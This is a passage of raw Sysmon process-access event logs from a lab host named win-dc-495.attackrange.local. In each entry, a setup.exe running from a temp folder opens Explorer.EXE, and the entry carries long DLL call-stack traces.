13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Wind